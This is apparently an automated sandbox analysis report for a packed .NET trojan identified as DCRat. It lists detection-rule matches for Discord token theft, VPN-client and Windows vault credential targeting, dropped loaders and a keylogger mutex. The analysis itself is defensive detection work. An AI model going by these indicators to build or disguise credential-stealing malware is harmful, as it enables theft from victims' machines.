Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameClientAny.exe" vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameClient.exe" vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe, 00000000.00000002.2005938092.0000000012919000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameWinDefend.exe4 vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Binary or memory string: OriginalFilenameTESTING.exe4 vs SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: dump.pcap, type: PCAP Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.0.Infected.exe.30000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 20.2.Loader.exe.1d000000.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 2.0.Client.exe.350000.0.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 20.2.Loader.exe.1d000000.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 20.2.Loader.exe.1dc20000.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 21.2.Loaader.exe.1d630000.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 21.2.Loaader.exe.1d630000.7.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 20.2.Loader.exe.1dc20000.7.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 20.2.Loader.exe.1d160000.6.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 20.2.Loader.exe.1d160000.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000014.00000002.2864018440.000000001DC20000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 00000014.00000002.2814130598.000000001D000000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 00000015.00000002.3282228143.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000014.00000002.2824829342.000000001D160000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 00000003.00000002.2032453597.0000000002301000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000012.00000002.2097619560.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.000000000313B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.0000000003126000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3394522285.000000001332A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000003.00000002.2031490283.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000015.00000002.3567109190.000000001D630000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 00000015.00000002.3248245047.00000000012B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3532252741.000000001BC21000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.0000000003071000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.0000000003177000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 00000015.00000002.3532252741.000000001BBB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000012.00000002.2087235357.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 00000015.00000002.3282228143.00000000030CC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Loaader.exe PID: 7280, type: MEMORYSTR Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED Matched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
Source: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: WinDefend.exe.0.dr Static PE information: Section: %q2hF6 ZLIB complexity 1.0006310096153845
Source: Client.exe.0.dr, Settings.cs Base64 encoded string:
Source: Infected.exe.0.dr, Settings.cs Base64 encoded string:
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Settings.cs Base64 encoded string:
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, Settings.cs Base64 encoded string:
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Settings.cs Base64 encoded string:
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, Settings.cs Base64 encoded string:
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, Settings.cs Base64 encoded string:
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Settings.cs Base64 encoded string:
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, Mesth4ods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, Mesth4ods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, Mesth4ods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, Mesth4ods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, Mesth4ods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, Mesth4ods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, Methods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Client.exe.0.dr, Methods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Client.exe.0.dr, Methods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: Infected.exe.0.dr, Mesth4ods.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: Infected.exe.0.dr, Mesth4ods.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, DInvokeCore.cs Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.raw.unpack, DInvokeCore.cs Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.raw.unpack, DInvokeCore.cs Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.raw.unpack, DInvokeCore.cs Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: Infected.exe.0.dr, DInvokeCore.cs Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: Client.exe.0.dr, DInvokeCore.cs Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, DInvokeCore.cs Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29f4968.4.raw.unpack, DInvokeCore.cs Suspicious method names: .DInvokeCore.DynamicAPIInvoke
Source: whoami.exe, 00000028.00000002.2230637919.000001E068988000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;.VBP
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@118/59@6/6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.log
Source: C:\Users\user\AppData\Roaming\Loaader.exe Mutant created: \Sessions\1\BaseNamedObjects\i??Fe?4?z2U?wXC6Af?fUT?6
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7384
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2448:120:WilError_03
Source: C:\Users\user\AppData\Roaming\Loader.exe Mutant created: \Sessions\1\BaseNamedObjects\OfflineKeylogger
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Users\user\AppData\Roaming\Loader.exe Mutant created: \Sessions\1\BaseNamedObjects\scgofjarww
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8088:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8096:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5476:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3528:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7044:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2228:120:WilError_03
